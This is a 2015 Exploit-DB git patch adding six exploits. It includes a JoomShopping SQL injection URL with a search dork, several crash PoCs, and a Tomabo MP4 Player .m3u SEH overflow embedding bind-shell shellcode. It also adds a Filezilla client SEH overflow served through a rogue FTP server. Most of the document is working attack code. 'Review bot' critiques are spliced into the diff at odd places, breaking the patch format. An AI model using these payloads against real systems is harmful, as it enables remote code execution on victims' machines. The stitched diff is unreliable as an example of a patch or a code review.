From 648b463161e19bd3ea647d924cdbb5decffeb95c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 9 Aug 2015 05:02:36 +0000
Subject: [PATCH] DB: 2015-08-09 6 new exploits

---
 files.csv | 6 +
 platforms/linux/dos/37743.pl | 43 +++++
 platforms/php/webapps/37714.txt | 11 ++
 platforms/windows/dos/37719.py | 21 +++
 platforms/windows/dos/37727.py | 21 +++
 platforms/windows/local/37730.py | 58 +++++++
 platforms/windows/remote/37729.py | 260 ++++++++++++++++++++++++++++++
 7 files changed, 420 insertions(+)
 create mode 100755 platforms/linux/dos/37743.pl
 create mode 100755 platforms/php/webapps/37714.txt
 create mode 100755 platforms/windows/dos/37719.py
 create mode 100755 platforms/windows/dos/37727.py
 create mode 100755 platforms/windows/local/37730.py
 create mode 100755 platforms/windows/remote/37729.py

diff --git a/files.csv b/files.csv
index 113cbc355..3f964221f 100755
--- a/files.csv
+++ b/files.csv
@@ -34040,10 +34040,12 @@ id,file,description,date,author,platform,type,port
 37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
 37710,platforms/linux/local/37710.txt,"Sudo <=1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
 37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
+37714,platforms/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,php,webapps,80
 37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
 37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
 37717,platforms/windows/dos/37717.pl,"KMPlayer 3.9.x - .srt Crash PoC",2015-07-31,"Peyman Motevalli Manesh",windows,dos,0
 37718,platforms/windows/dos/37718.py,"T-Mobile Internet Manager - Contact Name Crash PoC",2015-07-31,"SATHISH ARTHAR",windows,dos,0
+37719,platforms/windows/dos/37719.py,"Acunetix Web Vulnerability Scanner 9.5 - Crash PoC",2015-07-31,"Hadi Zomorodi Monavar",windows,dos,0
 37720,platforms/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0
 37721,platforms/multiple/dos/37721.c,"BIND9 - TKEY PoC",2015-08-01,"Errata Security",multiple,dos,0
 37722,platforms/linux/local/37722.c,"Linux Privilege Escalation Due to Nested NMIs Interrupting espfix64",2015-08-05,"Andrew Lutomirski",linux,local,0
@@ -34051,9 +34053,13 @@ id,file,description,date,author,platform,type,port
 37724,platforms/linux/local/37724.asm,"Linux x86 Memory Sinkhole Privilege Escalation PoC",2015-08-07,"Christopher Domas",linux,local,0
 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0
 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80
+37727,platforms/windows/dos/37727.py,"Python IDLE 2.7.8 - Crash PoC",2015-08-07,"Hadi Zomorodi Monavar",windows,dos,0
+37729,platforms/windows/remote/37729.py,"Filezilla Client 2.2.X - SEH Buffer Overflow Exploit",2015-08-07,ly0n,windows,remote,0
+37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow",2015-08-07,"Saeid Atabaki",windows,local,0
 37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21
 37732,platforms/win32/local/37732.c,"Windows NDProxy Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80
 37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
 37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent XSS",2015-08-07,"Owais Mehtab",php,webapps,80
 37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031
+37743,platforms/linux/dos/37743.pl,"Brasero - Crash Proof Of Concept",2015-08-08,"Mohammad Reza Espargham",linux,dos,0
diff --git a/platforms/linux/dos/37743.pl b/platforms/linux/dos/37743.pl
new file mode 100755
index 000000000..210d3f779
--- /dev/null
+++ b/platforms/linux/dos/37743.pl
@@ -0,0 +1,43 @@
+#!/usr/bin/perl -w
+# Title : Kali (brasero) - Crash Proof Of Concept
+# website : https://www.kali.org/downloads/
+# Tested : kali 1.x
+#
+#
+# Author : Mohammad Reza Espargham
+# Linkedin : https://ir.linkedin.com/in/rezasp
+# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
+# Website : www.reza.es
+# Twitter : https://twitter.com/rezesp
+# FaceBook : https://www.facebook.com/mohammadreza.espargham
+#
+#
+
+#Demo : http://youtu.be/XMu5ZXupbOI
+
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+
+
+$path="/tmp/r3z4.m3u";
+my $PoC = "\x41" x 10000 ;
+open(crash , ">", $path);
+print crash $PoC;
+close(crash);
+
+
+use threads;
+
+
+sub check_app { #thread sub
+ system("brasero $path");
+ return 0;
+}
+
+my @threads;
+for (my $i = 0; $i < 20; $i++) {
+ my $thread = threads->create(\&check_app);
+ push(@threads, $thread);
+}
+foreach (@threads) { #join
+ $_->join();
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/37714.txt b/platforms/php/webapps/37714.txt
new file mode 100755
index 000000000..2fb8e7f8a
--- /dev/null
+++ b/platforms/php/webapps/37714.txt
@@ -0,0 +1,11 @@
+# Exploit Title: [JoomShopping Blind Sql injection]
+# Google Dork: [allinurl:"/modules/mod_jshopping_products_wfl/js/"]
+# Date: [2015-07-24]
+# Exploit Author: [Mormoroth]
+# Vendor Homepage: [http://www.webdesigner-profi.de]
+# Software Link: [http://www.webdesigner-profi.de/joomla-webdesign/joomla-shop/downloads.html]
+# Version: [All]
+# Tested on: [Linux]
+----------------------------
+site/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a
+----------------------------
\ No newline at end of file
diff --git a/platforms/windows/dos/37719.py b/platforms/windows/dos/37719.py
new file mode 100755
index 000000000..0aa3bd104
--- /dev/null
+++ b/platforms/windows/dos/37719.py
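Review bot: `open(crash , ">", $path);` never checks its return value, and `$path` is the fixed, predictable `/tmp/r3z4.m3u` in a shared directory, so if the file cannot be written (or was pre-created by another local user, possibly as a symlink) the 20 `brasero` threads run against something other than the intended 10,000-byte playlist and the outcome is still reported as a crash of the player. Change it to `open(my $crash, ">", $path) or die "cannot write $path: $!";` and prefer a private path from `File::Temp` over a hard-coded /tmp name. The entry also records no brasero version and no crash signature or backtrace, and it launches 20 GUI instances in parallel, so a reader cannot tell whether the failure comes from the oversized playlist entry or simply from running 20 copies at once; a header line naming the version reproduced on and what was observed (hang, SIGSEGV, abort) would make the PoC usable.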
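Review bot: The single request `settings.php?id=209 and 1=2-- a` does not by itself demonstrate a blind injection; a blind SQLi entry needs the control pair (`id=209 and 1=1-- a` returning the normal page while `1=2` returns a different one) or a time-based probe, and it should describe the observable difference, which this entry does not. `# Version: [All]` is not supported by a test on one installation; record the JoomShopping version actually tested and leave the rest unverified. Since the Google dork keys on the module path, a line stating that only sites exposing `mod_jshopping_products_wfl` are in scope would set expectations for readers.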
@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+# Title : Acunetix Web Vulnerability Scanner 9.5 - Crash Proof Of Concept
+# Website : https://www.acunetix.com
+# Tested : win 7 / win 8.1 / win vista
+#
+#
+# Author : Hadi Zomorodi Monavar
+# Email : zomorodihadi@gmail.com
+#
+# 1 . run python code : python poc.py
+# 2 . open hadi.txt and copy content to clipboard
+# 3 . open "Acunetix Web Vulnerability Scanner 9.5"
+# 4 . from Tools Explorer --> subdomain scanner
+# 5 . Paste ClipBoard on "Domain"
+# 6 . Click start
+# 7 . Crashed ;)
+
+crash = "\x41"*9000 #B0F
+file = open("hadi.txt", "w")
+file.write(crash)
+file.close()
\ No newline at end of file
diff --git a/platforms/windows/dos/37727.py b/platforms/windows/dos/37727.py
new file mode 100755
index 000000000..e9f1ea751
--- /dev/null
+++ b/platforms/windows/dos/37727.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+# Title : Python IDLE 2.7.8 - Crash Proof Of Concept
+# Website : http://www.python.org/idle/
+# Tested : Windows 7 / Windows 8.1
+#
+#
+# Author : Hadi Zomorodi Monavar
+# Email : zomorodihadi@gmail.com
+#
+# 1 . run python code : python poc.py
+# 2 . open r3z4.txt and copy content to clipboard
+# 3 . open "python 2.7.8 IDLE"
+# 4 . from Menu (edit --> find)
+# 5 . Paste ClipBoard on "find"
+# 6 . Enter
+# 7 . Crashed ;)
+
+crash = "\x41"*900000 #B0F
+file = open("r3z4.txt", "w")
+file.write(crash)
+file.close()
\ No newline at end of file
diff --git a/platforms/windows/local/37730.py b/platforms/windows/local/37730.py
new file mode 100755
index 000000000..f4e99e39c
--- /dev/null
+++ b/platforms/windows/local/37730.py
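Review bot: The `#B0F` comment on `crash = "\x41"*9000` asserts a buffer overflow, but the entry shows only that the subdomain scanner stops after a 9,000-character domain is pasted into it — no exception address, register state or overwritten SEH record — so unless the author has that evidence the comment should say what was seen, e.g. `# 9000 x 'A' in the Domain field makes the subdomain scanner crash; root cause not analysed`. The trigger requires the Acunetix operator to paste the string by hand, so no attacker-controlled input path is visible here; one sentence stating that limitation would keep readers from classifying it above a local DoS. The script also leaves the handle in a variable named `file`, shadowing the builtin, and never closes it on error; `with open("hadi.txt", "w") as out: out.write(crash)` is the usual form.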
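Review bot: Nothing in the entry shows that pasting 900,000 characters into IDLE's Find dialog corrupts memory rather than merely hanging or aborting a Python/Tk search, so the `#B0F` comment on `crash = "\x41"*900000` is unsupported and should be replaced by what was observed (for example `# IDLE stops responding / exits when searching for a 900,000-char string; cause not analysed`). The user has to paste the string into their own editor, so no remote or cross-user boundary is crossed; the header should say so. As in the sibling PoC, `file` shadows a builtin and the handle is not closed on error — `with open("r3z4.txt", "w") as out: out.write(crash)`.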
@@ -0,0 +1,58 @@
+#!/usr/bin/python
+# Exploit Title: Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow
+# Date: 03/08/2015
+# Exploit Author: Saeid Atabaki
+# E-Mail: bytecod3r gmail.com, saeid Nsecurity.org
+# Linkedin: https://www.linkedin.com/in/saeidatabaki
+# Vendor Homepage: http://tomabo.com/mp4-player/index.html
+# Version: 3.11.3
+# Tested on: Windows XP SP3
+#---------------------------------------------------------------------#
+# Badchars: "\x00\x0a\x0d\x0c\x20\x09\x1a"'
+#
+# nc 192.168.11.136 8080
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+#
+# C:\Documents and Settings\Administrator\Desktop>
+#---------------------------------------------------------------------#
+
+import sys, struct
+file="crash.m3u"
+
+# Windows bind shell port 8080, feel free to swap shellcode
+sc = ""
+sc += "\xdd\xc1\xd9\x74\x24\xf4\xb8\xd3\x4b\xb2\xa4\x5d\x31"
+sc += "\xc9\xb1\x53\x31\x45\x17\x83\xc5\x04\x03\x96\x58\x50"
+sc += "\x51\xe4\xb7\x16\x9a\x14\x48\x77\x12\xf1\x79\xb7\x40"
+sc += "\x72\x29\x07\x02\xd6\xc6\xec\x46\xc2\x5d\x80\x4e\xe5"
+sc += "\xd6\x2f\xa9\xc8\xe7\x1c\x89\x4b\x64\x5f\xde\xab\x55"
+sc += "\x90\x13\xaa\x92\xcd\xde\xfe\x4b\x99\x4d\xee\xf8\xd7"
+sc += "\x4d\x85\xb3\xf6\xd5\x7a\x03\xf8\xf4\x2d\x1f\xa3\xd6"
+sc += "\xcc\xcc\xdf\x5e\xd6\x11\xe5\x29\x6d\xe1\x91\xab\xa7"
+sc += "\x3b\x59\x07\x86\xf3\xa8\x59\xcf\x34\x53\x2c\x39\x47"
+sc += "\xee\x37\xfe\x35\x34\xbd\xe4\x9e\xbf\x65\xc0\x1f\x13"
+sc += "\xf3\x83\x2c\xd8\x77\xcb\x30\xdf\x54\x60\x4c\x54\x5b"
+sc += "\xa6\xc4\x2e\x78\x62\x8c\xf5\xe1\x33\x68\x5b\x1d\x23"
+sc += "\xd3\x04\xbb\x28\xfe\x51\xb6\x73\x97\x96\xfb\x8b\x67"
+sc += "\xb1\x8c\xf8\x55\x1e\x27\x96\xd5\xd7\xe1\x61\x19\xc2"
+sc += "\x56\xfd\xe4\xed\xa6\xd4\x22\xb9\xf6\x4e\x82\xc2\x9c"
+sc += "\x8e\x2b\x17\x08\x86\x8a\xc8\x2f\x6b\x6c\xb9\xef\xc3"
+sc += "\x05\xd3\xff\x3c\x35\xdc\xd5\x55\xde\x21\xd6\x46\x8f"
+sc += "\xaf\x30\x12\xbf\xf9\xeb\x8a\x7d\xde\x23\x2d\x7d\x34"
+sc += "\x1c\xd9\x36\x5e\x9b\xe6\xc6\x74\x8b\x70\x4d\x9b\x0f"
+sc += "\x61\x52\xb6\x27\xf6\xc5\x4c\xa6\xb5\x74\x50\xe3\x2d"
+sc += "\x14\xc3\x68\xad\x53\xf8\x26\xfa\x34\xce\x3e\x6e\xa9"
+sc += "\x69\xe9\x8c\x30\xef\xd2\x14\xef\xcc\xdd\x95\x62\x68"
+sc += "\xfa\x85\xba\x71\x46\xf1\x12\x24\x10\xaf\xd4\x9e\xd2"
+sc += "\x19\x8f\x4d\xbd\xcd\x56\xbe\x7e\x8b\x56\xeb\x08\x73"
+sc += "\xe6\x42\x4d\x8c\xc7\x02\x59\xf5\x35\xb3\xa6\x2c\xfe"
+sc += "\xc3\xec\x6c\x57\x4c\xa9\xe5\xe5\x11\x4a\xd0\x2a\x2c"
+sc += "\xc9\xd0\xd2\xcb\xd1\x91\xd7\x90\x55\x4a\xaa\x89\x33"
+sc += "\x6c\x19\xa9\x11"
+
+payload = "\x90" * 1028 + "\xeb\x18\x90\x90" + "\x69\x9e\x48\x00" + "\x90" * 20 + sc
+
+writeFile = open (file, "w")
+writeFile.write( payload )
+writeFile.close()
\ No newline at end of file
diff --git a/platforms/windows/remote/37729.py b/platforms/windows/remote/37729.py
new file mode 100755
index 000000000..79d190351
--- /dev/null
+++ b/platforms/windows/remote/37729.py
@@ -0,0 +1,260 @@ +# Exploit Title: Filezilla client 2.2.X SEH buffer overflow exploit +# Date: 02/08/2015 +# Exploit Author: ly0n +# Vendor Homepage: filezilla-project.org/ +# Software Link: http://www.oldapps.com/filezilla.php?app=7cdf14e88e9dfa85fb661c1c6e649e90 +# Version: tested on filezilla 2.2.21 +# Tested on: Windows XP sp3 english + + +#!/usr/bin/env python2 +# coding: utf-8 +import os,socket,threading,time +#import traceback + +# visit: ly0n.me +# greetz: NBS + +#MSGBOX "BrokenByte" +msgbox = ("\x68\x6e\x33\x72\x00\x68\x75\x74" +"\x69\x30\x68\x5e\x58\x65\x63\x89" +"\xe3\x68\x20\x20\x20\x00\x68\x68" +"\x65\x72\x65\x68\x77\x61\x73\x20" +"\x68\x6e\x33\x72\x20\x68\x75\x74" +"\x69\x30\x68\x5e\x58\x65\x63\x89" +"\xe1\x31\xc0\x50\x53\x51\x50\x50" +"\xbe\xea\x07\x45\x7e\xff\xe6\x31" +"\xc0\x50\xb8\x12\xcb\x81\x7c\xff" +"\xe0") + +nops = "\x90" * 100 +#77EA9CAC POP POP RET kernel32.dll <- seh +#EB069090 SHORT JUMP 6 POS + 2 NOPS <- nseh +nseh = "\xeb\x06\x90\x90" +seh = "\xAC\x9C\xEA\x77" + +allow_delete = False +local_ip = "192.168.11.6" #SERVER LOCAL IP +local_port = 21 #DESIRED PORT + +buffer1 = "\x41" * 1896 + nseh + seh + nops + msgbox + nops +buffer = buffer1 + ".txt" +currdir=os.path.abspath('.') + +class FTPserverThread(threading.Thread): + def __init__(self,(conn,addr)): + self.conn=conn + self.addr=addr + self.basewd=currdir + self.cwd=self.basewd + self.rest=False + self.pasv_mode=False + threading.Thread.__init__(self) + + def run(self): + self.conn.send('220 Welcome!\r\n') + while True: + cmd=self.conn.recv(256) + if not cmd: break + else: + print 'Recieved:',cmd + try: + func=getattr(self,cmd[:4].strip().upper()) + func(cmd) + except Exception,e: + print 'ERROR:',e + #traceback.print_exc() + self.conn.send('500 Sorry.\r\n') + + def SYST(self,cmd): + self.conn.send('215 UNIX Type: L8\r\n') + def OPTS(self,cmd): + if cmd[5:-2].upper()=='UTF8 ON': + self.conn.send('200 OK.\r\n') + else: + self.conn.send('451 Sorry.\r\n') + def USER(self,cmd): + 
self.conn.send('331 OK.\r\n') + def PASS(self,cmd): + self.conn.send('230 OK.\r\n') + #self.conn.send('530 Incorrect.\r\n') + def QUIT(self,cmd): + self.conn.send('221 Goodbye.\r\n') + def NOOP(self,cmd): + self.conn.send('200 OK.\r\n') + def TYPE(self,cmd): + self.mode=cmd[5] + self.conn.send('200 Binary mode.\r\n') + + def CDUP(self,cmd): + if not os.path.samefile(self.cwd,self.basewd): + #learn from stackoverflow + self.cwd=os.path.abspath(os.path.join(self.cwd,'..')) + self.conn.send('200 OK.\r\n') + def PWD(self,cmd): + cwd=os.path.relpath(self.cwd,self.basewd) + if cwd=='.': + cwd='/' + else: + cwd='/'+cwd + self.conn.send('257 \"%s\"\r\n' % cwd) + def CWD(self,cmd): + chwd=cmd[4:-2] + if chwd=='/': + self.cwd=self.basewd + elif chwd[0]=='/': + self.cwd=os.path.join(self.basewd,chwd[1:]) + else: + self.cwd=os.path.join(self.cwd,chwd) + self.conn.send('250 OK.\r\n') + + def PORT(self,cmd): + if self.pasv_mode: + self.servsock.close() + self.pasv_mode = False + l=cmd[5:].split(',') + self.dataAddr='.'.join(l[:4]) + self.dataPort=(int(l[4])<<8)+int(l[5]) + self.conn.send('200 Get port.\r\n') + + def PASV(self,cmd): # from http://goo.gl/3if2U + self.pasv_mode = True + self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + self.servsock.bind((local_ip,0)) + self.servsock.listen(1) + ip, port = self.servsock.getsockname() + print 'open', ip, port + self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' % + (','.join(ip.split('.')), port>>8&0xFF, port&0xFF)) + + def start_datasock(self): + if self.pasv_mode: + self.datasock, addr = self.servsock.accept() + print 'connect:', addr + else: + self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + self.datasock.connect((self.dataAddr,self.dataPort)) + + def stop_datasock(self): + self.datasock.close() + if self.pasv_mode: + self.servsock.close() + + + def LIST(self,cmd): + self.conn.send('150 Here comes the directory listing.\r\n') + print 'list:', self.cwd + self.start_datasock() + dirlist = 
"drwxrwxrwx 1 100 0 11111 Jun 11 21:10" +buffer1+"\r\n\n" + dirlist += "-rw-rw-r-- 1 1176 1176 1060 Aug 16 22:22 "+buffer+" \r\n\n" + self.datasock.send("total 2\r\n"+dirlist) + self.stop_datasock() + self.conn.send('226 Directory send OK.\r\n') + + def toListItem(self,fn): + st=os.stat(fn) + fullmode='rwxrwxrwx' + mode='' + for i in range(9): + mode+=((st.st_mode>>(8-i))&1) and fullmode[i] or '-' + d=(os.path.isdir(fn)) and 'd' or '-' + ftime=time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime)) + return d+mode+' 1 user group '+str(st.st_size)+ftime+os.path.basename(fn) + + def MKD(self,cmd): + dn=os.path.join(self.cwd,cmd[4:-2]) + os.mkdir(dn) + self.conn.send('257 Directory created.\r\n') + + def RMD(self,cmd): + dn=os.path.join(self.cwd,cmd[4:-2]) + if allow_delete: + os.rmdir(dn) + self.conn.send('250 Directory deleted.\r\n') + else: + self.conn.send('450 Not allowed.\r\n') + + def DELE(self,cmd): + fn=os.path.join(self.cwd,cmd[5:-2]) + if allow_delete: + os.remove(fn) + self.conn.send('250 File deleted.\r\n') + else: + self.conn.send('450 Not allowed.\r\n') + + def RNFR(self,cmd): + self.rnfn=os.path.join(self.cwd,cmd[5:-2]) + self.conn.send('350 Ready.\r\n') + + def RNTO(self,cmd): + fn=os.path.join(self.cwd,cmd[5:-2]) + os.rename(self.rnfn,fn) + self.conn.send('250 File renamed.\r\n') + + def REST(self,cmd): + self.pos=int(cmd[5:-2]) + self.rest=True + self.conn.send('250 File position reseted.\r\n') + + def RETR(self,cmd): + fn=os.path.join(self.cwd,cmd[5:-2]) + #fn=os.path.join(self.cwd,cmd[5:-2]).lstrip('/') + print 'Downlowding:',fn + if self.mode=='I': + fi=open(fn,'rb') + else: + fi=open(fn,'r') + self.conn.send('150 Opening data connection.\r\n') + if self.rest: + fi.seek(self.pos) + self.rest=False + data= fi.read(1024) + self.start_datasock() + while data: + self.datasock.send(data) + data=fi.read(1024) + fi.close() + self.stop_datasock() + self.conn.send('226 Transfer complete.\r\n') + + def STOR(self,cmd): + fn=os.path.join(self.cwd,cmd[5:-2]) 
+ print 'Uplaoding:',fn + if self.mode=='I': + fo=open(fn,'wb') + else: + fo=open(fn,'w') + self.conn.send('150 Opening data connection.\r\n') + self.start_datasock() + while True: + data=self.datasock.recv(1024) + if not data: break + fo.write(data) + fo.close() + self.stop_datasock() + self.conn.send('226 Transfer complete.\r\n') + +class FTPserver(threading.Thread): + def __init__(self): + self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.sock.bind((local_ip,local_port)) + threading.Thread.__init__(self) + + def run(self): + self.sock.listen(5) + while True: + th=FTPserverThread(self.sock.accept()) + th.daemon=True + th.start() + + def stop(self): + self.sock.close() + +if __name__=='__main__': + ftp=FTPserver() + ftp.daemon=True + ftp.start() + print 'On', local_ip, ':', local_port + raw_input('Enter to end...\n') + ftp.stop() +
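Review bot: The helper FTP server in `FTPserverThread` serves far more than the exploit needs: `RETR` does `fn=os.path.join(self.cwd,cmd[5:-2])` and opens the result, `STOR` does the same and writes to it, and `RNTO`/`MKD` likewise, with the `.lstrip('/')` guard left commented out, so any client that can reach `local_ip:21` can read or overwrite arbitrary files on the attacker's machine with an absolute path or `..` — while the overflow itself is delivered entirely by `LIST`, which never touches the filesystem. Either drop the RETR/STOR/RNTO/MKD handlers or route every client-supplied path through a check that it stays under `basewd`, as below. `bind((local_ip,local_port))` followed by `listen(5)` accepts every client, so restricting to the target's address or stopping the server after the first LIST is worth a line. `seh = "\xAC\x9C\xEA\x77"` is a kernel32 POP POP RET, which ties the exploit to exactly the "Windows XP sp3 english" build named in the header; a comment with the kernel32 version it was taken from would save readers a failed attempt.
```python
    def _under_root(self, rel):
        # Resolve the client-supplied path and refuse anything outside basewd.
        root = os.path.realpath(self.basewd)
        full = os.path.realpath(os.path.join(self.cwd, rel.lstrip('/')))
        if full != root and not full.startswith(root + os.sep):
            raise ValueError('path escapes server root: %r' % rel)
        return full

    # … unchanged: SYST/OPTS/USER/PASS/…, PORT/PASV, LIST, toListItem …

    def RETR(self,cmd):
        fn=self._under_root(cmd[5:-2])
        # … unchanged: open, seek, send loop …

    def STOR(self,cmd):
        fn=self._under_root(cmd[5:-2])
        # … unchanged: open, recv loop …
```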